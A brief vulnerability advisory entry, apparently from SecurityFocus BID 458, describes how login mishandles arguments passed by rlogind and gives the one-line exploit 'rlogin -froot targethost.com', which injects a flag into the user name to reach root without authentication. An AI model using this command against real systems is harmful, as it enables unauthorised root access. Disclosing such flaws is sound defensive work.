source: http://www.securityfocus.com/bid/458/info

A problem with the way login parses arguments as passed by rlogind that may allow access to the root account. 

%rlogin -froot targethost.com